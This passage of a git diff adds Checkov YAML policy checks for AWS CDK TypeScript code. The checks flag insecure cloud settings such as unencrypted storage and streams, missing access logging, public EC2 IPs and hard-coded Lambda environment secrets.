+              new $AWS.Table(<ANY>, {<ANY>, pointInTimeRecovery: true ,<ANY>} ,<ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/EBSEncryption.yaml b/checkov/cdk/checks/typescript/EBSEncryption.yaml
new file mode 100644
index 00000000000..6a518cdfc6d
--- /dev/null
+++ b/checkov/cdk/checks/typescript/EBSEncryption.yaml
@@ -0,0 +1,21 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_3
+  name: Ensure all data stored in the EBS is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: new $AWS.Volume(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.Volume(<ANY>, {<ANY>, encrypted: true ,<ANY>} , <ANY>)
+      - pattern: new $AWS.CfnVolume(<ANY>)
+        conditions:
+          - not_pattern: |
+              new $AWS.CfnVolume(<ANY>, {<ANY>, encrypted: true ,<ANY>} , <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/EC2PublicIP.yaml b/checkov/cdk/checks/typescript/EC2PublicIP.yaml
new file mode 100644
index 00000000000..be5d5e7f157
--- /dev/null
+++ b/checkov/cdk/checks/typescript/EC2PublicIP.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_88
+  name: EC2 instance should not have public IP
+  category: NETWORKING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  patterns:
+    or:
+      - pattern: | 
+          new $AWS.Instance(<ANY>, { <ANY>, associatePublicIpAddress: true, <ANY> }, <ANY>)
+      - pattern: | 
+          new $AWS.LaunchTemplate(<ANY>, { <ANY>, associatePublicIpAddress: true, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ECRImageScanning.yaml b/checkov/cdk/checks/typescript/ECRImageScanning.yaml
new file mode 100644
index 00000000000..64bd6009720
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ECRImageScanning.yaml
@@ -0,0 +1,16 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_163
+  name: Ensure ECR image scanning on push is enabled
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $AWS.Repository(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Repository(<ANY>, { <ANY>, imageScanOnPush: true, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ECRImmutableTags.yaml b/checkov/cdk/checks/typescript/ECRImmutableTags.yaml
new file mode 100644
index 00000000000..c7439ef8d96
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ECRImmutableTags.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_51
+  name: Ensure ECR Image Tags are immutable
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Repository(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Repository(<ANY>, { <ANY>, imageTagMutability: ecr.TagMutability.IMMUTABLE, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml b/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml
new file mode 100644
index 00000000000..da883d97214
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_136
+  name: Ensure that ECR repositories are encrypted using KMS
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Repository(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $ECR.Repository(<ANY>, { <ANY>, encryption: $ECR.RepositoryEncryption.KMS, <ANY> }, <ANY>)
+    - not_pattern: |
+        new $ECR.Repository(<ANY>, { <ANY>, encryptionKey: new $KMS.Key(<ANY>), <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml b/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml
new file mode 100644
index 00000000000..18cdca5ff4e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml
@@ -0,0 +1,16 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_65
+  name: Ensure container insights are enabled on ECS cluster
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new ecs.Cluster(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Cluster(<ANY>, { <ANY>, containerInsights: true, <ANY>}, <ANY>)
diff --git a/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml b/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml
new file mode 100644
index 00000000000..b8b0187fde0
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_97
+  name: Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $AWS.$FUNC(<ANY>, {<ANY>, volumes: [<ANY>, {<ANY>, efsVolumeConfiguration: {<ANY>, transitEncryption: "DISABLED", <ANY>}, <ANY>},<ANY>],<ANY>})
+  conditions:
+    or:
+      - metavariable: $FUNC
+        regex: (TaskDefinition|Ec2TaskDefinition|FargateTaskDefinition|ExternalTaskDefinition)
diff --git a/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml b/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml
new file mode 100644
index 00000000000..02a98a1aebe
--- /dev/null
+++ b/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_42
+  name: Ensure EFS is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.FileSystem(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.FileSystem(<ANY>, { <ANY>, encrypted: true, <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml b/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml
new file mode 100644
index 00000000000..ec0daf396e4
--- /dev/null
+++ b/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml
@@ -0,0 +1,16 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_58
+  name: Ensure EKS Cluster has Secrets Encryption Enabled
+  category: KUBERNETES
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: |
+    new $AWS.CfnCluster(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnCluster(<ANY>, {<ANY>, encryptionConfig: [<ANY>, { <ANY>, resources: ['secrets'], <ANY> }, <ANY>], <ANY> }, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ELBAccessLogs.yaml b/checkov/cdk/checks/typescript/ELBAccessLogs.yaml
new file mode 100644
index 00000000000..e75437b7188
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ELBAccessLogs.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_92
+  name: Ensure the ELB has access logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.LoadBalancer(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.LoadBalancer(<ANY>, {<ANY>, accessLoggingPolicy: {<ANY>, enabled: true, <ANY>} ,<ANY>})
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml b/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml
new file mode 100644
index 00000000000..2e28a64a11c
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_91
+  name: Ensure the ELBv2 (Application/Network) has access logging enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: const $ELB = new $AWS.ApplicationLoadBalancer(<ANY>);
+  conditions:
+    - not_within: |
+        const $ELB = new $AWS.ApplicationLoadBalancer(<ANY>)
+        <ANY>
+        $ELB.logAccessLogs(<ANY>)
diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml
new file mode 100644
index 00000000000..b1d041ea66a
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_29
+  name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnReplicationGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnReplicationGroup(<ANY>, {<ANY>, atRestEncryptionEnabled: true , <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml
new file mode 100644
index 00000000000..9befa3ad7af
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_30
+  name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnReplicationGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnReplicationGroup(<ANY>, {<ANY>, transitEncryptionEnabled: true , <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml
new file mode 100644
index 00000000000..ab3500521b8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml
@@ -0,0 +1,17 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_31
+  name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.CfnReplicationGroup(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.CfnReplicationGroup(<ANY>, {<ANY>, transitEncryptionEnabled: true, <ANY>, authToken: $VAR, <ANY>}, <ANY>)
+    - not_pattern: |
+        new $AWS.CfnReplicationGroup(<ANY>, {<ANY>, authToken: $VAR, <ANY>, transitEncryptionEnabled: true, <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml b/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml
new file mode 100644
index 00000000000..4506663319c
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_83
+  name: Ensure Elasticsearch Domain enforces HTTPS
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Domain(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Domain(<ANY>, {<ANY>, enforceHttps: true , <ANY>}, <ANY>)
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml b/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml
new file mode 100644
index 00000000000..3936e01b592
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml
@@ -0,0 +1,15 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_84
+  name: Ensure Elasticsearch Domain Logging is enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  pattern: new $AWS.Domain(<ANY>)
+  conditions:
+    - not_pattern: |
+        new $AWS.Domain(<ANY>, {<ANY>, logging: {<ANY>, appLogEnabled: true, <ANY> }, <ANY>}, <ANY>)
diff --git a/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml b/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml
new file mode 100644
index 00000000000..b315ddca068
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_5
+  name: Ensure all data stored in the Elasticsearch is securely encrypted at rest
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_elasticsearch.CfnDomain(<ANY>, <ANY>, { <ANY> });
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_elasticsearch.CfnDomain(<ANY>, <ANY>, { <ANY>, encryptionAtRestOptions: { <ANY>, enabled: true, <ANY> }, <ANY> });
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY> , enabled: false, <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty
diff --git a/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml b/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml
new file mode 100644
index 00000000000..fc9dbf3d2d9
--- /dev/null
+++ b/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml
@@ -0,0 +1,22 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_6
+  name: Ensure all Elasticsearch has node-to-node encryption enabled
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_elasticsearch.CfnDomain(<ANY>, <ANY>, { <ANY> });
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_elasticsearch.CfnDomain(<ANY>, <ANY>, { <ANY>, nodeToNodeEncryptionOptions: { <ANY>, enabled: true, <ANY> }, <ANY> });
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY> , enabled: false, <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml b/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml
new file mode 100644
index 00000000000..a1a7eca23a7
--- /dev/null
+++ b/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml
@@ -0,0 +1,25 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_94
+  name: Ensure Glue Data Catalog Encryption is enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_glue.CfnDataCatalogEncryptionSettings(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnDataCatalogEncryptionSettings(<ANY>, <ANY>, { <ANY>, dataCatalogEncryptionSettings: { <ANY>, connectionPasswordEncryption :{ <ANY>, returnConnectionPasswordEncrypted: true , <ANY> }, <ANY>, encryptionAtRest:{ <ANY>, catalogEncryptionMode: "SSE-KMS", <ANY> }, <ANY>}, <ANY>})
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY>, dataCatalogEncryptionSettings: { <ANY> }, <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, dataCatalogEncryptionSettings: { <ANY>, connectionPasswordEncryption: { <ANY>, returnConnectionPasswordEncrypted: true, <ANY> }, <ANY>, encryptionAtRest: { <ANY>, catalogEncryptionMode: "SSE-KMS", <ANY> }, <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_glue.CfnDataCatalogEncryptionSettingsProps
diff --git a/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml b/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml
new file mode 100644
index 00000000000..816afcbf2f0
--- /dev/null
+++ b/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml
@@ -0,0 +1,28 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_99
+  name: Ensure Glue Security Configuration Encryption is enabled
+  category: LOGGING
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_glue.CfnSecurityConfiguration(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnSecurityConfiguration(<ANY>, <ANY>, { <ANY>, encryptionConfiguration: { <ANY>, cloudWatchEncryption: { <ANY>, cloudWatchEncryptionMode: 'SSE-KMS', <ANY> }, <ANY>, jobBookmarksEncryption: { <ANY>, jobBookmarksEncryptionMode: 'CSE-KMS', <ANY> },  <ANY>, s3Encryptions: [ <ANY>, { <ANY>, s3EncryptionMode: 'SSE-KMS', <ANY> }, <ANY> ], <ANY> }, <ANY> })
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnSecurityConfiguration(<ANY>, <ANY>, { <ANY>, encryptionConfiguration: { <ANY>, cloudWatchEncryption: { <ANY>, cloudWatchEncryptionMode: 'SSE-KMS', <ANY> }, <ANY>, jobBookmarksEncryption: { <ANY>, jobBookmarksEncryptionMode: 'CSE-KMS', <ANY> },  <ANY>, s3Encryptions: [ <ANY>, { <ANY>, s3EncryptionMode: 'SSE-S3', <ANY> }, <ANY> ], <ANY> }, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY> , encryptionConfiguration: { <ANY> }, <ANY> }"
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, encryptionConfiguration: { <ANY>, cloudWatchEncryption: { <ANY>, cloudWatchEncryptionMode: "SSE-KMS", <ANY> }, <ANY>, jobBookmarksEncryption: { <ANY>, jobBookmarksEncryptionMode: 'CSE-KMS', <ANY> },  <ANY>, s3Encryptions: [ <ANY>, { <ANY>, s3EncryptionMode: 'SSE-KMS', <ANY> }, <ANY> ], <ANY> }, <ANY> }
+        - not_pattern: |
+            $X = { <ANY>, encryptionConfiguration: { <ANY>, cloudWatchEncryption: { <ANY>, cloudWatchEncryptionMode: 'SSE-KMS', <ANY> }, <ANY>, jobBookmarksEncryption: { <ANY>, jobBookmarksEncryptionMode: 'CSE-KMS', <ANY> },  <ANY>, s3Encryptions: [ <ANY>, { <ANY>, s3EncryptionMode: 'SSE-S3', <ANY> }, <ANY> ], <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_glue.CfnSecurityConfigurationProps
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml b/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml
new file mode 100644
index 00000000000..e81e5acde2e
--- /dev/null
+++ b/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml
@@ -0,0 +1,49 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_195
+  name: Ensure Glue component has a security configuration associated
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_glue.CfnCrawler(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnCrawler(<ANY>, <ANY>, { <ANY>, crawlerSecurityConfiguration: $CON, <ANY> } )
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_glue.CfnDevEndpoint(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnDevEndpoint(<ANY>, <ANY>, { <ANY>, securityConfiguration: $VAL, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_glue.CfnJob(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_glue.CfnJob(<ANY>, <ANY>, { <ANY>, securityConfiguration: $VAL, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_glue.CfnCrawlerProps
+        - not_pattern: |
+            $X = { <ANY>, crawlerSecurityConfiguration: $VAL, <ANY> }
+    - pattern: "$X = { <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_glue.CfnDevEndpointProps
+        - not_pattern: |
+            $X = { <ANY>, securityConfiguration: $VAL, <ANY> }
+    - pattern: "$X = { <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_glue.CfnJobProps
+        - not_pattern: |
+            $X = { <ANY>, securityConfiguration: $VAL, <ANY> }
+
diff --git a/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml b/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml
new file mode 100644
index 00000000000..419fa1a26a4
--- /dev/null
+++ b/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml
@@ -0,0 +1,28 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_40
+  name: Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.)
+  category: IAM
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: |
+        new $PACKAGE.aws_iam.Policy(<ANY>, <ANY>, { <ANY>, users: <ANY>, <ANY> })
+      conditions:
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $P = new $PACKAGE.aws_iam.Policy(<ANY>)
+        <ANY>
+        $P.attachToUser(<ANY>)
+      conditions:
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY>, users :<ANY>, <ANY> }"
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_iam.PolicyProps
diff --git a/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml b/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml
new file mode 100644
index 00000000000..27b742890a8
--- /dev/null
+++ b/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml
@@ -0,0 +1,24 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_43
+  name: Ensure Kinesis Stream is securely encrypted
+  category: ENCRYPTION
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_kinesis.CfnStream(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_kinesis.CfnStream(<ANY>, <ANY>, { <ANY>, streamEncryption: { <ANY>, encryptionType: "KMS", <ANY> }, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: "$X = { <ANY> }"
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, streamEncryption: { <ANY>, encryptionType: "KMS", <ANY> }, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_kinesis.CfnStreamProps
diff --git a/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml b/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml
new file mode 100644
index 00000000000..2ee96da3fde
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml
@@ -0,0 +1,48 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_116
+  name: Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)
+  category: GENERAL_SECURITY
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, deadLetterQueue: <ANY>, <ANY>, deadLetterQueueEnabled: true ,<ANY>})
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_lambda.CfnFunction(<ANY>, <ANY>, { <ANY>, deadLetterConfig: <ANY>, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY> })
+      conditions:
+        - not_pattern: |
+            new $PACKAGE.aws_sam.CfnFunction(<ANY>, <ANY>, { <ANY>, deadLetterQueue: <ANY>, <ANY> })
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: $X =  { <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, deadLetterQueue: <ANY>, <ANY>, deadLetterQueueEnabled: true ,<ANY>}
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.FunctionProps
+    - pattern: $X =  { <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, deadLetterConfig: <ANY>, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.CfnFunctionProps
+    - pattern: $X =  { <ANY> }
+      conditions:
+        - not_pattern: |
+            $X = { <ANY>, deadLetterQueue: <ANY>, <ANY> }
+        - metavariable: $X
+          type: aws-cdk-lib.aws_sam.CfnFunctionProps
\ No newline at end of file
diff --git a/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml b/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml
new file mode 100644
index 00000000000..a359e1691f9
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml
@@ -0,0 +1,38 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_45
+  name: Ensure no hard-coded secrets exist in lambda environment
+  category: SECRETS
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - patterns:
+        or:
+          - pattern: |
+              new $PACKAGE.aws_lambda.Function(<ANY> ,<ANY>, { <ANY>, environment: { $ARG1:'$ARG2' }, <ANY> })
+          - pattern: |
+              new $PACKAGE.aws_lambda.CfnFunction(<ANY> ,<ANY>, { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>}, <ANY> })
+          - pattern: |
+              new $PACKAGE.aws_sam.CfnFunction(<ANY> ,<ANY>, { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>}, <ANY> })
+      conditions:
+        - metavariable: $PACKAGE
+          comparison: $PACKAGE == "aws-cdk-lib"
+    - pattern: |
+        $X = { <ANY>, environment: { $ARG1:'$ARG2' }, <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.FunctionProps
+    - pattern: |
+        $X =  { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>}, <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_lambda.CfnFunctionProps
+    - pattern: |
+        $X = { <ANY>, environment: { <ANY>, variables: { $ARG1:'$ARG2'}, <ANY>}, <ANY> }
+      conditions:
+        - metavariable: $X
+          type: aws-cdk-lib.aws_sam.CfnFunctionProps
diff --git a/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml b/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml
new file mode 100644
index 00000000000..eb2a4279cc2
--- /dev/null
+++ b/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml
@@ -0,0 +1,66 @@
+metadata:
+  version: 0.2
+  approach: define failing
+  id: CKV_AWS_173
+  name: Check encryption settings for Lambda environmental variable
+  category: Encryption
+  framework: cdk
+scope:
+  languages:
+    - typescript
+definition:
+  or:
+    - pattern: |
+        new $PACKAGE.aws_lambda.Function(<ANY>, <ANY>, { <ANY>, environment: { <ANY>, $ARG1:'$ARG2', <ANY> }, <ANY> } )
+      conditions:
+        - not_pattern: |
